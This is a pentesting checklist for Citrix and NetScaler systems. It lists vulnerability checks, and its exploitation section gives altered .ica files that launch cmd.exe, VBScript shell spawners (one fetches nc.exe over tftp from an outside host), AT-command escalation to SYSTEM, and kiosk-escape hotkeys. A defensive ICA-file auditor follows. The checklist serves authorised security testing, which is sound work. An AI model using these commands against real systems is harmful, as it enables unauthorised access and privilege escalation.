
Citrix Specific Testing:

Citrix provides remote access services to multiple users across a wide range of platforms. The following information will help you conduct a vulnerability assessment/penetration test of Citrix implementations.



      • CGI abuses
        • NetScaler web management interface ip address cookie disclosure
      • CGI abuses : Cross Site Scripting (XSS)
        • Citrix MetaFrame XP login.asp
        • Citrix NFuse Launch Scripts
        • NetScaler web management XSS
      • Misc.
        • Citrix Published Applications Remote Enumeration
        • NetScaler web management cookie information
      • Service Detection
        • Citrix Licensing Server detection
        • Citrix Server detection
      • Web Servers
        • Citrix NFuse Server launch.asp Arbitrary Server/ Port Redirect
        • NetScaler web management cookie cipher weakness
        • NetScaler web management interface detection
        • Unencrypted NetScaler web management interface
      • Windows
        • Citrix Licensing Server License Management Console
        • Citrix Password Manager Agent Secondary Credential Information Disclosure
        • Citrix Password Manager Service Stored Credentials Disclosure
        • Citrix Presentation Server Remote Code Execution
        • Citrix Presentation Server Client Program Neighbourhood Agent (PNAgent) Denial of Service
        • Citrix web interface 4.6, 5.0, 5.0.1 XSS
        • Novell Client TS/ Citrix Session Arbitrary User Profile Invocation
        • NetScaler web management cookie cipher weakness
        • NetScaler web management interface detection
        • NetScaler web management login
        • Unencrypted NetScaler web management interface
    • perl nikto.pl -host ip_address -port port_no
      • Note: It is possible to grep all Citrix/NFuse/NetScaler vulnerabilities currently housed in the nikto db and create your own db_tests file, replacing the local version in the nikto\plugins directory, should you wish to limit your enumeration specifically to Citrix vulnerabilities. As of 1 Oct 09, there are 9 specific tests meeting these requirements.

  • Exploitation

    • Alter default .ica files
      • InitialProgram=cmd.exe
      • InitialProgram=c:\windows\system32\cmd.exe
      • InitialProgram=explorer.exe
    • Enumerate and Connect
      • For applications identified by Citrix-pa-scan
          • Requires pas.wri to be present in the same directory (obtained from the output using Citrix-pa-scan)
          • Writes output to pas_results.wri
      • For published applications with a Citrix client when the master browser is non-public.
          • pa-proxy.pl IP_to_proxy_to (i.e. remote server)
    • Manual Testing
      • Create Batch File (cmd.bat)
          • cmd.exe
          • echo off
          • command
          • echo on
        • Option Explicit
        • Dim objShell
        • Set objShell = CreateObject("WScript.Shell")
        • objShell.Run "%comspec% /k"
        • WScript.Quit
        • alternative functionality
          • objShell.Run "%comspec% /k c: & dir"
          • objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
          • objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
        • Integrated Kiosk Attack Tool
          • Reconnaissance
          • FileSystem Links
          • Common Dialogs
          • Application Handlers
          • Browser Plugins
          • iKAT Tools
      • AT Command - privilege escalation
        • AT HH:MM /interactive "cmd.exe"
        • AT HH:MM /interactive %comspec% /k
        • Note: AT by default runs as SYSTEM. Although it is enabled for a normal user, it will only work with these privileges for an admin; however, it is still worth a try.

      • Keyboard Shortcuts/ Hotkeys
        • Ctrl + h – View History
        • Ctrl + n – New Browser
        • Shift + Left Click – New Browser
        • Ctrl + o – Internet Address (browse feature)
        • Ctrl + p – Print (to file)
        • Right Click (Shift + F10)
          • Save Image As
          • View Source
        • F1 – Jump to URL
        • SHIFT+F1: Local Task List
        • SHIFT+F2: Toggle Title Bar
        • SHIFT+F3: Close Remote Application
        • CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
        • CTRL+F2: Remote Task List
        • CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
        • ALT+F2: Cycle through programs
        • ALT+PLUS: Alt+TAB
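
For the "Alter default .ica files" item above, a defender-side check, added here as an example and not part of the original checklist: it parses an ICA file and flags any InitialProgram that is not a "#Name" published-application reference. The SHELLS set, the sample file and the audit_ica name are assumptions of this example.

```python
import configparser
import ntpath

# Assumption for this example: binaries that hand the user a shell or desktop.
SHELLS = {"cmd.exe", "explorer.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Constructed sample ICA file (documentation address, not captured data).
SAMPLE_ICA = r"""
[ApplicationServers]
Notepad=
Support=

[Notepad]
Address=192.0.2.10
InitialProgram=#Notepad
TransportDriver=TCP/IP

[Support]
Address=192.0.2.10
InitialProgram=c:\windows\system32\cmd.exe
TransportDriver=TCP/IP
"""

def audit_ica(text):
    """Return (section, InitialProgram value, reason) for each suspicious entry."""
    ica = configparser.ConfigParser(interpolation=None, strict=False,
                                    allow_no_value=True, delimiters=("=",))
    ica.read_string(text)
    findings = []
    for section in ica.sections():
        value = (ica.get(section, "InitialProgram", fallback=None) or "").strip()
        if not value or value.startswith("#"):
            continue  # empty, or "#Name" = reference to a published application
        if value.startswith('"'):
            first = value[1:].split('"', 1)[0]   # quoted path may contain spaces
        else:
            first = value.split()[0]             # drop arguments such as "/k"
        first = first.lower()
        exe = ntpath.basename(first)
        if "." not in exe:
            exe += ".exe"  # "cmd" and "cmd.exe" start the same program
        reason = "shell" if first == "%comspec%" or exe in SHELLS else "not-a-published-app"
        findings.append((section, value, reason))
    return findings

if __name__ == "__main__":
    for finding in audit_ica(SAMPLE_ICA):
        print(finding)
```

Run it over the .ica files a Web Interface or file share hands out; the server-side control is still to restrict sessions to published applications so a client-edited InitialProgram is refused.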

    COPYRIGHT (C) 2000 - 2011 InfoSecPro.com ALL RIGHTS RESERVED